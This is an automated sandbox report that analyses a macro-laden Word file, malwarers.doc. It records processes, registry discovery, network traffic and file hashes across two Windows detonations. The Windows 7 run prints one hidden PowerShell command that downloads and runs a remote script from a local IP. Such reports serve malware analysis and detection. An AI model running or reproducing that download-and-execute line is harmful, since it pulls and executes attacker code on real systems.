Malware Analysis Report

2025-03-15 07:56

Sample ID 240806-jhlgysxdjd
Target malwarers.doc
SHA256 1c8d2db41d2ffc6da5c52a203ec8be94253c35b27e073447889c8af3cfa1be4f
Tags
macro macro_on_action discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1c8d2db41d2ffc6da5c52a203ec8be94253c35b27e073447889c8af3cfa1be4f

Threat Level: Known bad

The file malwarers.doc was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action discovery execution

Process spawned unexpected child process

Office macro that triggers on suspicious action

Suspicious Office macro

Command and Scripting Interpreter: PowerShell

Drops file in Windows directory

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 07:40

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 07:40

Reported

2024-08-06 07:42

Platform

win7-20240708-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malwarers.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malwarers.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe –WindowStyle Hidden IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.246/1234567892222.ps1')

Network

Country Destination Domain Proto
N/A 192.168.1.246:80 tcp

Files

memory/2972-0-0x000000002F4F1000-0x000000002F4F2000-memory.dmp

memory/2972-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2972-2-0x000000007131D000-0x0000000071328000-memory.dmp

memory/2972-8-0x0000000004D80000-0x0000000004E80000-memory.dmp

memory/2972-13-0x0000000000450000-0x0000000000550000-memory.dmp

memory/2972-15-0x0000000004D80000-0x0000000004E80000-memory.dmp

memory/2972-14-0x0000000004D80000-0x0000000004E80000-memory.dmp

memory/2972-18-0x000000007131D000-0x0000000071328000-memory.dmp

memory/2972-19-0x0000000004D80000-0x0000000004E80000-memory.dmp

memory/2972-21-0x0000000000450000-0x0000000000550000-memory.dmp

memory/2972-22-0x0000000000450000-0x0000000000550000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 5bee31d15c6798f4c4bfbc5a4ef5b0d0
SHA1 668b03bb264b53f1f5823e7ead171e3bb2401a4b
SHA256 221e7e293a207ff04e68cac0771533f8adebd3f0937ae08cdb808c9632d765f6
SHA512 a727c46a2c396b1e9b97a284ca2645819bc319d7eafda82cf3f412170d5674325d793cb3816a86945fef009f811f501b58725e7429e5bf596e74084b585492c1

memory/2972-37-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2972-39-0x0000000000450000-0x0000000000550000-memory.dmp

memory/2972-38-0x000000007131D000-0x0000000071328000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 07:40

Reported

2024-08-06 07:42

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malwarers.doc" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malwarers.doc" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.17.209.123:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 123.209.17.2.in-addr.arpa udp
US 8.8.8.8:53 143.252.19.2.in-addr.arpa udp

Files

memory/2360-0-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp

memory/2360-2-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp

memory/2360-1-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp

memory/2360-4-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp

memory/2360-3-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp

memory/2360-5-0x00007FF965ECD000-0x00007FF965ECE000-memory.dmp

memory/2360-9-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-11-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-13-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-12-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-14-0x00007FF923750000-0x00007FF923760000-memory.dmp

memory/2360-15-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-10-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-8-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-7-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-6-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-20-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-22-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-21-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-19-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-18-0x00007FF923750000-0x00007FF923760000-memory.dmp

memory/2360-17-0x00007FF965E30000-0x00007FF966025000-memory.dmp

memory/2360-16-0x00007FF965E30000-0x00007FF966025000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 3df0e89b413fe2ff36c8610f7493536f
SHA1 68315e1f8e1e0cfe67581106ebffbd87ac278b52
SHA256 75eeea8e4d37197d179809004fed94cdd6eae1b32ce794853fe8e7da42c2cf85
SHA512 9df311530c7ec4f62adbd7b60d51a683aa84adcc49136b3e0765c215666dc95e325b8affc34be6cc31703a81ffc66a1e3025fed137264d6f87dcd65e267c0a1e

memory/2360-42-0x00007FF965E30000-0x00007FF966025000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

memory/2360-215-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp

memory/2360-218-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp

memory/2360-216-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp

memory/2360-217-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp

memory/2360-219-0x00007FF965E30000-0x00007FF966025000-memory.dmp